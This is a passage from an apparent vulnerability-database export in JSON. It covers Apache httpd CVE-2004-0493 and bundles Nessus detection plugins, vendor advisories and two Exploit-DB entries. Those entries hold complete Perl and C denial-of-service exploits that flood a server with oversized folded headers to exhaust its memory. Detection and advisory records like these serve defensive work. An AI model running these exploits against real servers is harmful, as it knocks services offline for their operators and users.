amounts of memory. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0493 to this issue.\n\nUsers of the Apache HTTP server should upgrade to these updated\npackages, which contain backported patches that address these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2004-0488.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2004-0493.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apacheweek.com/features/security-20\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2004-342.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd, httpd-devel and / or mod_ssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:342\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"httpd-2.0.46-32.ent.3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"httpd-devel-2.0.46-32.ent.3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"mod_ssl-2.0.46-32.ent.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / mod_ssl\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-07-01T14:09:38", "references": ["http://www.guninski.com/httpd1.html"], "pluginID": "12293", "description": "The remote host appears to be running a version of Apache 2.x that is prior to 2.0.50. It is, therefore, affected by a denial of service vulnerability that can be triggered by sending a specially crafted HTTP request, which results in the consumption of an arbitrary amount of memory. On 64-bit systems with more than 4GB virtual memory, this may lead to a heap based buffer overflow.\n\nThere is also a denial of service vulnerability in mod_ssl's 'ssl_io_filter_cleanup' function. By sending a request to a vulnerable server over SSL and closing the connection before the server can send a response, an attacker can cause a memory violation that crashes the server.", "edition": 7, "reporter": "Tenable", "published": "2004-06-29T00:00:00", "title": "Apache 2.x < 2.0.50 Multiple Remote DoS", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web Servers", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493", "CVE-2004-0748"], "modified": "2018-06-29T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_INPUT_HEADER_FOLDING_DOS.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12293", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(12293);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2018/06/29 12:01:03\");\n\n script_cve_id(\"CVE-2004-0493\", \"CVE-2004-0748\");\n script_bugtraq_id(10619, 12877);\n \n script_name(english:\"Apache 2.x < 2.0.50 Multiple Remote DoS\");\n script_summary(english:\"Checks for version of Apache\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a denial of service.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running a version of Apache 2.x that is\nprior to 2.0.50. It is, therefore, affected by a denial of service\nvulnerability that can be triggered by sending a specially crafted\nHTTP request, which results in the consumption of an arbitrary amount\nof memory. On 64-bit systems with more than 4GB virtual memory, this\nmay lead to a heap based buffer overflow.\n\nThere is also a denial of service vulnerability in mod_ssl's\n'ssl_io_filter_cleanup' function. By sending a request to a vulnerable\nserver over SSL and closing the connection before the server can send\na response, an attacker can cause a memory violation that crashes the\nserver.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.guninski.com/httpd1.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apache 2.0.50 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/06/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/06/28\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n\n script_dependencies(\"apache_http_version.nasl\");\n script_require_keys(\"installed_sw/Apache\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nget_install_count(app_name:\"Apache\", exit_if_zero:TRUE);\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:\"Apache\", port:port, exit_if_unknown_ver:TRUE);\nbanner = get_kb_item_or_exit('www/apache/'+port+'/source', exit_code:1);\n \nif(pgrep(pattern:\"^Server:.*Apache(-AdvancedExtranetServer)?/2\\.0\\.(([0-9][^0-9])([0-3][0-9][^0-9])|(4[0-9][^0-9])).*\", string:banner))\n{\n security_warning(port);\n exit(0);\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"Apache\", port, install[\"version\"]);\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-07-15T04:09:14", "references": ["http://www.nessus.org/u?210abeb5"], "pluginID": "14676", "description": "The remote host is missing Security Update 2004-09-07. This security update fixes the following components :\n\n - CoreFoundation\n - IPSec\n - Kerberos\n - libpcap\n - lukemftpd\n - NetworkConfig\n - OpenLDAP\n - OpenSSH\n - PPPDialer\n - rsync\n - Safari\n - tcpdump\n\nThese applications contain multiple vulnerabilities that may allow a remote attacker to execute arbitrary code.", "edition": 4, "reporter": "Tenable", "published": "2004-09-08T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2004-09-07)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "MacOS X Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0825", "CVE-2004-0824", "CVE-2004-0184", "CVE-2004-0794", "CVE-2004-0183", "CVE-2004-0493", "CVE-2004-0823", "CVE-2004-0361", "CVE-2004-0822", "CVE-2004-0607", "CVE-2004-0523", "CVE-2004-0426", "CVE-2004-0488", "CVE-2004-0821", "CVE-2004-0175", "CVE-2004-0521", "CVE-2004-0720"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD20040907.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=14676", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(14676);\n script_version (\"1.25\");\n\n script_cve_id(\"CVE-2004-0175\", \"CVE-2004-0183\", \"CVE-2004-0184\", \"CVE-2004-0361\", \"CVE-2004-0426\", \n \"CVE-2004-0488\", \"CVE-2004-0493\", \"CVE-2004-0521\", \"CVE-2004-0523\", \"CVE-2004-0607\",\n \"CVE-2004-0720\", \"CVE-2004-0794\", \"CVE-2004-0821\", \"CVE-2004-0822\", \"CVE-2004-0823\",\n \"CVE-2004-0824\", \"CVE-2004-0825\");\n script_bugtraq_id(9815, 9986, 10003, 10004, 10247, 10397, 11135, 11136, 11137, 11138, 11139, 11140);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2004-09-07)\");\n script_summary(english:\"Check for Security Update 2004-09-07\");\n \n script_set_attribute( attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes a security\nissue.\" );\n script_set_attribute( attribute:\"description\", value:\n\"The remote host is missing Security Update 2004-09-07. This security\nupdate fixes the following components :\n\n - CoreFoundation\n - IPSec\n - Kerberos\n - libpcap\n - lukemftpd\n - NetworkConfig\n - OpenLDAP\n - OpenSSH\n - PPPDialer\n - rsync\n - Safari\n - tcpdump\n\nThese applications contain multiple vulnerabilities that may allow\na remote attacker to execute arbitrary code.\" );\n # http://web.archive.org/web/20080915104713/http://support.apple.com/kb/HT1646?\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?210abeb5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install Security Update 2004-09-07.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(22);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/09/08\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2004/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2004/09/08\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\nuname = get_kb_item(\"Host/uname\");\n# MacOS X 10.2.8, 10.3.4 and 10.3.5 only\nif ( egrep(pattern:\"Darwin.* (6\\.8\\.|7\\.[45]\\.)\", string:uname) )\n{\n if ( ! egrep(pattern:\"^SecUpd(Srvr)?2004-09-07\", string:packages) ) security_hole(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "httpd": [{"lastseen": "2016-09-26T21:39:38", "references": [], "description": "\n\nA memory leak in parsing of HTTP headers which can be triggered\nremotely may allow a denial of service attack due to excessive memory\nconsumption.\n\n", "edition": 1, "reporter": "Apache Team Foundation", "published": "2004-06-13T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "httpd", "title": "Apache Httpd < 2.0.50: Header parsing memory leak", "bulletinFamily": "software", "affectedSoftware": [{"name": "Apache httpd", "version": "2.0.39", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.36", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.37", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.48", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.42", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.49", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.35", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.43", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.44", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.40", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.47", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.45", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.46", "operator": "eq"}], "cvelist": ["CVE-2004-0493"], "modified": "2004-07-01T00:00:00", "id": "HTTPD:3C611CFBC257124CABFC3F9D43E0FB40", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-11T18:10:29", "references": [], "edition": 1, "description": "\n\nA memory leak in parsing of HTTP headers which can be triggered\nremotely may allow a denial of service attack due to excessive memory\nconsumption.\n\n", "reporter": "Apache Team Foundation", "published": "2004-06-13T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Apache Httpd < None: Header parsing memory leak", "type": "httpd", "bulletinFamily": "software", "affectedSoftware": [{"name": "Apache httpd", "version": "2.0.39", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.36", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.37", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.48", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.42", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.49", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.35", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.43", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.44", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.40", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.47", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.45", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.46", "operator": "eq"}], "cvelist": ["CVE-2004-0493"], "modified": "2004-07-01T00:00:00", "href": "https://httpd.apache.org/security_report.html", "id": "HTTPD:716DC8755E794DA060B129F86E2DA830", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T12:14:38", "osvdbidlist": ["7269"], "references": [], "description": "Apache HTTPd Arbitrary Long HTTP Headers DoS. CVE-2004-0493. Dos exploits for multiple platform", "edition": 1, "reporter": "bkbll", "published": "2004-07-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "Apache HTTPd Arbitrary Long HTTP Headers DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0493"], "modified": "2004-07-22T00:00:00", "id": "EDB-ID:360", "href": "https://www.exploit-db.com/exploits/360/", "sourceData": "#/usr/bin/perl\r\n#\r\n#exploit for apache ap_get_mime_headers_core() vuln\r\n#\r\n#adv is here: http://www.guninski.com/httpd1.html\r\n#\r\n#version: apache 2 <2.0.49 apache 1 not tested.\r\n#\r\n#by bkbll bkbll#cnhonker.net http://www.cnhonker.com\r\n#\r\n#tail -f /var/log/messages\r\n#Jul 1 17:43:16 www kernel: Out of Memory: Killed process 658 (httpd)\r\n#\r\n\r\nuse IO::Socket::INET;\r\n\r\n$host=\"10.10.10.114\";\r\n$port=80;\r\n$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto => 'tcp') || die \"new error$@\\n\";\r\nbinmode($sock);\r\n$hostname=\"Host: $host\";\r\n$buf2='A'x50;\r\n$buf4='A'x8183;\r\n$len=length($buf2);\r\n$buf=\"GET / HTTP/1.1\\r\\n\";\r\nsend($sock,$buf,0) || die \"send error:$@\\n\";\r\nfor($i= 0; $i < 2000000; $i++)\r\n{\r\n $buf=\" $buf4\\r\\n\";\r\n send($sock,$buf,0) || die \"send error:$@, target maybe have been D.o.S?\\n\";\r\n}\r\n$buf=\"$hostname\\r\\n\";\r\n$buf.=\"Content-Length: $len\\r\\n\";\r\n\r\n$buf.=\"\\r\\n\";\r\n$buf.=$buf2.\"\\r\\n\\r\\n\";\r\n\r\nsend($sock,$buf,0) || die \"send error:$@\\n\";\r\nprint \"Ok, our buffer have send to target \\n\";\r\nclose($sock);", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/360/"}, {"lastseen": "2016-01-31T12:15:58", "osvdbidlist": ["7269"], "references": [], "description": "Apache HTTPd Arbitrary Long HTTP Headers DoS (c version). CVE-2004-0493. Dos exploit for linux platform", "edition": 1, "reporter": "N/A", "published": "2004-08-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Apache HTTPd - Arbitrary Long HTTP Headers DoS C", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0493"], "modified": "2004-08-02T00:00:00", "id": "EDB-ID:371", "href": "https://www.exploit-db.com/exploits/371/", "sourceData": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/wait.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <sys/socket.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#define A 0x41\r\n#define PORT 80\r\n\r\nstruct sockaddr_in hrm;\r\n\r\nint conn(char *ip)\r\n{\r\nint sockfd;\r\nhrm.sin_family = AF_INET;\r\nhrm.sin_port = htons(PORT);\r\nhrm.sin_addr.s_addr = inet_addr(ip);\r\nbzero(&(hrm.sin_zero),8);\r\nsockfd=socket(AF_INET,SOCK_STREAM,0);\r\nif((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr)))<0)\r\n{\r\nperror(\"connect\");\r\nexit(0);\r\n}\r\nreturn sockfd;\r\n}\r\nint main(int argc, char *argv[])\r\n{\r\nint i,x;\r\nchar buf[300],a1[8132],a2[50],host[100],content[100];\r\nchar *ip=argv[1],*new=malloc(sizeof(int));\r\nsprintf(new,\"\\r\\n\");\r\nmemset(a1,'\\0',8132);\r\nmemset(host,'\\0',100);\r\nmemset(content,'\\0',100);\r\na1[0] = ' ';\r\nfor(i=1;i<8132;i++)\r\na1[i] = A;\r\nif(argc<2)\r\n{\r\nprintf(\"%s: IP\\n\",argv[0]);\r\nexit(0);\r\n}\r\nx = conn(ip);\r\nprintf(\"[x] Connected to: %s.\\n\",inet_ntoa(hrm.sin_addr));\r\nsprintf(host,\"Host: %s\\r\\n\",argv[1]);\r\nsprintf(content,\"Content-Length: 50\\r\\n\");\r\nsprintf(buf,\"GET / HTTP/1.0\\r\\n\");\r\nwrite(x,buf,strlen(buf));\r\nprintf(\"[x] Sending buffer...\");\r\nfor(i=0;i<2000;i++)\r\n{\r\nwrite(x,a1,strlen(a1));\r\nwrite(x,new,strlen(new));\r\n}\r\nmemset(buf,'\\0',300);\r\nstrcpy(buf,host);\r\nstrcat(buf,content);\r\nfor(i=0;i<50;i++)\r\na2[i] = A;\r\nstrcat(buf,a2);\r\nstrcat(buf,\"\\r\\n\\r\\n\");\r\nwrite(x,buf,strlen(buf));\r\nprintf(\"done!\\n\");\r\nclose(x);\r\n\r\n}\r\n\r\n// milw0rm.com [2004-08-02]\r\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/371/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:02", "references": [], "edition": 1, "description": "## Vulnerability Description\nApache contains a flaw that may allow a remote denial of service. The issue is triggered when overly long header lines starting with either a TAB or SPACE character are processed by the \"ap_get_mime_headers_core()\" function, and will result in loss of availability for the service.\n## Solution Description\nUpgrade to version 2.0.50 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nApache contains a flaw that may allow a remote denial of service. The issue is triggered when overly long header lines starting with either a TAB or SPACE character are processed by the \"ap_get_mime_headers_core()\" function, and will result in loss of availability for the service.\n## References:\nVendor URL: http://www.apachefriends.org/en/xampp-linux.html\nVendor URL: http://www.apache.org\nVendor Specific Solution URL: http://www-1.ibm.com/support/docview.wss?rs=177&context=SSEQTJ&uid=swg24007451\n[Vendor Specific Advisory URL](http://security.gentoo.org/glsa/glsa-200407-03.xml)\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?rs=177&context=SSEQTJ&uid=swg21174271&loc=en_US&cs=utf-8&lang=en+en)\nSecurity Tracker: 1010599\nSecurity Tracker: 1010621\n[Secunia Advisory ID:11967](https://secuniaresearch.flexerasoftware.com/advisories/11967/)\n[Secunia Advisory ID:12004](https://secuniaresearch.flexerasoftware.com/advisories/12004/)\n[Secunia Advisory ID:12244](https://secuniaresearch.flexerasoftware.com/advisories/12244/)\n[Secunia Advisory ID:11956](https://secuniaresearch.flexerasoftware.com/advisories/11956/)\n[Secunia Advisory ID:12098](https://secuniaresearch.flexerasoftware.com/advisories/12098/)\n[Secunia Advisory ID:12023](https://secuniaresearch.flexerasoftware.com/advisories/12023/)\n[Secunia Advisory ID:12181](https://secuniaresearch.flexerasoftware.com/advisories/12181/)\n[Secunia Advisory ID:12646](https://secuniaresearch.flexerasoftware.com/advisories/12646/)\nOther Advisory URL: http://www.guninski.com/httpd1.html\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01064\nOther Advisory URL: http://www.apacheweek.com/features/security-20\nOther Advisory URL: http://rhn.redhat.com/errata/RHSA-2004-342.html\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:064\nOther Advisory URL: http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000868\n[Nessus Plugin ID:12293](https://vulners.com/search?query=pluginID:12293)\n[Nessus Plugin ID:14536](https://vulners.com/search?query=pluginID:14536)\n[Nessus Plugin ID:14163](https://vulners.com/search?query=pluginID:14163)\nGeneric Exploit URL: http://www.securiteam.com/exploits/5TP0Q0ADFO.html\n[CVE-2004-0493](https://vulners.com/cve/CVE-2004-0493)\n", "reporter": "Georgi Guninski(guninski@guninski.com)", "published": "2004-06-28T00:00:00", "title": "Multiple HTTP Server Input Header Folding DoS", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Apache", "version": "2.0.49", "operator": "eq"}, {"name": "HTTP Server", "version": "2.0.47", "operator": "eq"}, {"name": "Apache", "version": "2.0.48", "operator": "eq"}, {"name": "Apache", "version": "2.0.46", "operator": "eq"}, {"name": "HTTP Server", "version": "2.0.42.x", "operator": "eq"}, {"name": "Apache", "version": "2.0.47", "operator": "eq"}, {"name": "XAMPP", "version": "1.4.5", "operator": "eq"}, {"name": "HTTP Server", "version": "2.0.47.1", "operator": "eq"}], "cvelist": ["CVE-2004-0493"], "modified": "2004-06-28T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:7269", "id": "OSVDB:7269", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:15", "references": ["http://www.guninski.com/httpd1.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0493", "https://bugs.gentoo.org/show_bug.cgi?id=55441"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.0.49-r3", "packageName": "www-servers/apache", "packageFilename": "UNKNOWN", "arch": "all", "operator": "le"}], "description": "### Background\n\nThe Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems. The goal of this project is to provide a secure, efficient and extensible server that provides services in tune with the current HTTP standards. \n\n### Description\n\nA bug in the protocol.c file handling header lines will cause Apache to allocate memory for header lines starting with TAB or SPACE. \n\n### Impact\n\nAn attacker can exploit this vulnerability to perform a Denial of Service attack by causing Apache to exhaust all memory. On 64 bit systems with more than 4GB of virtual memory a possible integer signedness error could lead to a buffer based overflow causing Apache to crash and under some circumstances execute arbitrary code as the user running Apache, usually \"apache\". \n\n### Workaround\n\nThere is no known workaround at this time. All users are encouraged to upgrade to the latest available version: \n\n### Resolution\n\nApache 2 users should upgrade to the latest version of Apache: \n \n \n # emerge sync\n \n # emerge -pv \">=www-servers/apache-2.0.49-r4\"\n # emerge \">=www-servers/apache-2.0.49-r4\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2004-07-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "Apache 2: Remote denial of service attack", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0493"], "modified": "2007-12-30T00:00:00", "id": "GLSA-200407-03", "href": "https://security.gentoo.org/glsa/200407-03", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2017-08-02T22:57:43", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "enchantments_done": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.46-32.ent.3", "packageFilename": "httpd-2.0.46-32.ent.3.ia64.rpm", "packageName": "httpd", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.46-32.ent.3", "packageFilename": "httpd-devel-2.0.46-32.ent.3.ia64.rpm", "packageName": "httpd-devel", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.46-32.ent.3", "packageFilename": "mod_ssl-2.0.46-32.ent.3.ia64.rpm", "packageName": "mod_ssl", "arch": "ia64", "operator": "lt"}], "description": "The Apache HTTP server is a powerful, full-featured, efficient, and\nfreely-available Web server.\n\nA stack buffer overflow was discovered in mod_ssl that could be triggered\nif using the FakeBasicAuth option. If mod_ssl was sent a client certificate\nwith a subject DN field longer than 6000 characters, a stack overflow\noccured if FakeBasicAuth had been enabled. In order to exploit this issue\nthe carefully crafted malicious certificate would have had to be signed by\na Certificate Authority which mod_ssl is configured to trust. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2004-0488 to this issue.\n\nA remotely triggered memory leak in the Apache HTTP Server earlier than\nversion 2.0.50 was also discovered. This allowed a remote attacker to\nperform a denial of service attack against the server by forcing it to\nconsume large amounts of memory. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CAN-2004-0493 to this issue.\n\nUsers of the Apache HTTP server should upgrade to these updated packages,\nwhich contain backported patches that address these issues.", "reporter": "RedHat", "published": "2004-07-06T04:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "(RHSA-2004:342) httpd security update", "type": "redhat", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0488", "CVE-2004-0493"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": 